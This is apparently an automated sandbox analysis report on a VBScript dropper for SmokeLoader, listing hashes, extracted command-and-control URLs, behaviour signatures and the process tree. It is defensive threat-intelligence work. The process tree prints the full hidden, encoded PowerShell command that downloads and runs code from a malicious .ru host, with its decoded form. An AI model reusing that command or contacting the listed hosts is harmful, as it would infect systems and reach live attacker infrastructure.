Analysis

Max time kernel: 113s
Max time network: 63s
Platform: windows10-1703_x64
Resource: win10-20230220-en
Resource tags: arch:x64, arch:x86, image:win10-20230220-en, locale:en-us, os:windows10-1703-x64, system
Submitted: 03-06-2023 18:40
Static task: static1
Behavioral task: behavioral1
Sample: 375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936.vbs
Resource: win10-20230220-en
General

Target: 375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936.vbs
Size: 22KB
MD5: 642917731c4f19a1b7a1fab2333a84d2
SHA1: 742e8e1701b03a0638eec505e17ad453a612ac5e
SHA256: 375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936
SHA512: e27262555ca391e255200f5da4421ebd991ed1ff6399e82ed5f0ef76ced2d6e508fa96d4d23c62901e4eb55c21f0e131713669f1a39351ea1e4836c9cea593dd
SSDEEP: 384:Ym0ICzXSsFmDFFlhPAO0SBVNKemRJ0pIu+5B70VVa4EdPBS0d928DYGm3Mq:Y7UZL0ouNia4y7/sVL
Malware Config

Extracted:
http://americanocoffea.ru

Extracted (smokeloader, 2022):
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://zaliphone.com/
http://humanitarydp.ug/
http://zaikaopentra.com.ug/
http://zaikaopentra-com-ug.online/
http://infomalilopera.ru/
http://jskgdhjkdfhjdkjhd844.ru/
http://jkghdj2993jdjjdjd.ru/
http://kjhgdj99fuller.ru/
http://azartnyjboy.com/
http://zalamafiapopcultur.eu/
http://hopentools.site/
http://kismamabeforyougo.com/
http://kissmafiabeforyoudied.eu/
http://gondurasonline.ug/
http://nabufixservice.name/
http://filterfullproperty.ru/
http://alegoomaster.com/
http://freesitucionap.com/
http://droopily.eu/
http://prostotaknet.net/
http://zakolibal.online/
http://verycheap.store/
Signatures

- SmokeLoader
  Modular backdoor trojan in use since 2014.

- Blocklisted process makes network request (2 IoCs)
  Processes (flow / pid / process):
  2  4260  powershell.exe
  4  4260  powershell.exe

- Downloads MZ/PE file

- Executes dropped EXE (1 IoC)
  Processes (pid / process):
  4856  MhxDHvaX.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes (description / ioc / process):
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  MhxDHvaX.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  MhxDHvaX.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  MhxDHvaX.exe

- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid / process):
  4260  powershell.exe (3 entries)
  4856  MhxDHvaX.exe (2 entries)
  3164  (no process name recorded; all remaining entries)

- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes (pid / process):
  3164  (no process name recorded)

- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes (pid / process):
  4856  MhxDHvaX.exe

- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description / pid / process):
  Token: SeDebugPrivilege          4260  powershell.exe
  Token: SeShutdownPrivilege       3164  (no process name recorded)
  Token: SeCreatePagefilePrivilege 3164  (no process name recorded)

- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes (description / pid / process / target process):
  PID 4024 wrote to memory of 3436  4024  WScript.exe     cmd.exe         (2 entries)
  PID 3436 wrote to memory of 4260  3436  cmd.exe         powershell.exe  (2 entries)
  PID 4260 wrote to memory of 4856  4260  powershell.exe  MhxDHvaX.exe    (3 entries)

- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936.vbs"
  - Suspicious use of WriteProcessMemory

  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBtAGUAcgBpAGMAYQBuAG8AYwBvAGYAZgBlAGEALgByAHUAIgApAA==
    (The -Enc argument is UTF-16LE base64 and decodes to: IEX (New-Object Net.Webclient).downloadstring("http://americanocoffea.ru") -- the same URL as the first extracted config entry above.)
    - Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBtAGUAcgBpAGMAYQBuAG8AYwBvAGYAZgBlAGEALgByAHUAIgApAA==
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - C:\Users\Admin\AppData\Local\Temp\MhxDHvaX.exe
        "C:\Users\Admin\AppData\Local\Temp\MhxDHvaX.exe"
        - Executes dropped EXE
        - Checks SCSI registry key(s)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Users\Admin\AppData\Local\Temp\MhxDHvaX.exe
  Filesize: 274KB
  MD5: 1f95b8c2dc09a84f6a9fe6f74dbf7d96
  SHA1: 35f2c55596e43c2887d70a172d452fc5ac36835d
  SHA256: 9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330
  SHA512: 7d7bf42a7df0ec4dcf0f8ac891bee60871ddc45c9887d8b5022dcddc27fae7afdd2134370f1a5ac898c364c5d702e9fb84b496d7c8a253fefd96d65715ba563c
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjal132m.zgk.ps1
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

- C:\Users\Admin\AppData\Roaming\vbujsju
  Filesize: 274KB
  MD5: 1f95b8c2dc09a84f6a9fe6f74dbf7d96
  SHA1: 35f2c55596e43c2887d70a172d452fc5ac36835d
  SHA256: 9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330
  SHA512: 7d7bf42a7df0ec4dcf0f8ac891bee60871ddc45c9887d8b5022dcddc27fae7afdd2134370f1a5ac898c364c5d702e9fb84b496d7c8a253fefd96d65715ba563c

Memory dumps (pid-sequence-range):
- memory/3164-166-0x0000000001410000-0x0000000001426000-memory.dmp  Filesize: 88KB
- memory/4260-125-0x00000168405F0000-0x0000016840612000-memory.dmp  Filesize: 136KB
- memory/4260-128-0x0000016827EE0000-0x0000016827EF0000-memory.dmp  Filesize: 64KB
- memory/4260-130-0x0000016827EE0000-0x0000016827EF0000-memory.dmp  Filesize: 64KB
- memory/4260-132-0x00000168406A0000-0x0000016840716000-memory.dmp  Filesize: 472KB
- memory/4260-147-0x0000016827EE0000-0x0000016827EF0000-memory.dmp  Filesize: 64KB
- memory/4856-165-0x0000000000800000-0x0000000000809000-memory.dmp  Filesize: 36KB
- memory/4856-167-0x0000000000400000-0x000000000068A000-memory.dmp  Filesize: 2.5MB